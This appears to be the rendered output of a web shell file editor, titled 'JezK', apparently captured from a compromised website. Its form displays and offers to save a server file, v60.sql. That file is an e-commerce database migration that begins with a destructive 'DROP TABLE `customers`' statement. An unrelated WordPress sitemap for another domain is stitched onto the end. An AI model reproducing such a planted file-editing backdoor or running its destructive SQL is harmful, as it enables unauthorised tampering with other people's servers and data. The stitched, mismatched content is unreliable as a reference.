
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: v60.sql</h2><form method="post"><textarea name="file_content" rows="10" cols="50">DROP TABLE `customers`;

UPDATE `carts` SET `shipping_cost`=0.00 WHERE shipping_cost is null;
UPDATE `products` SET `shipping_cost`=0.00 WHERE shipping_cost is null;

ALTER TABLE `products` CHANGE `shipping_cost` `shipping_cost` DOUBLE(20,2) NOT NULL DEFAULT '0.00';
ALTER TABLE `carts` CHANGE `shipping_cost` `shipping_cost` DOUBLE(20,2) NOT NULL DEFAULT '0.00';

ALTER TABLE `shops` 
ADD `rating` double(3,2) NOT NULL DEFAULT 0.00 AFTER `address`,
ADD `num_of_reviews` int(11) NOT NULL DEFAULT 0 AFTER `rating`,
ADD `num_of_sale` int(11) NOT NULL DEFAULT 0 AFTER `num_of_reviews`,
ADD `seller_package_id` int(11) DEFAULT NULL AFTER `num_of_sale`,
ADD `product_upload_limit` int(11) NOT NULL DEFAULT 0 AFTER `seller_package_id`,
ADD `package_invalid_at` date DEFAULT NULL AFTER `product_upload_limit`,
ADD `verification_status` int(1) NOT NULL DEFAULT 0 AFTER `package_invalid_at`,
ADD `verification_info` longtext COLLATE utf8_unicode_ci DEFAULT NULL AFTER `verification_status`,
ADD `cash_on_delivery_status` int(1) NOT NULL DEFAULT 0 AFTER `verification_info`,
ADD `admin_to_pay` double(20,2) NOT NULL DEFAULT 0.00 AFTER `cash_on_delivery_status`,
ADD `bank_name` varchar(255) COLLATE utf8_unicode_ci DEFAULT NULL AFTER `delivery_pickup_longitude`,
ADD `bank_acc_name` varchar(200) COLLATE utf8_unicode_ci DEFAULT NULL AFTER `bank_name`,
ADD `bank_acc_no` varchar(50) COLLATE utf8_unicode_ci DEFAULT NULL AFTER `bank_acc_name`,
ADD `bank_routing_no` int(50) DEFAULT NULL AFTER `bank_acc_no`,
ADD `bank_payment_status` int(11) NOT NULL DEFAULT 0 AFTER `bank_routing_no`;

ALTER TABLE `products` CHANGE `cash_on_delivery` `cash_on_delivery` TINYINT(1) NOT NULL DEFAULT '0' COMMENT '1 = On, 0 = Off'; 

INSERT INTO `business_settings` (`id`, `type`, `value`, `lang`, `created_at`, `updated_at`) 
VALUES 
(NULL, 'min_order_amount_check_activation', NULL, NULL, current_timestamp(), current_timestamp()),
(NULL, 'minimum_order_amount', NULL, NULL, current_timestamp(), current_timestamp());

UPDATE `business_settings` SET `value` = '6.0' WHERE `business_settings`.`type` = 'current_version';


COMMIT;</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://satyadevaresidency.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-gallery-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-testimonial-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-taxonomies-post_tag-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-taxonomies-gallery_cat-1.xml</loc></sitemap></sitemapindex>
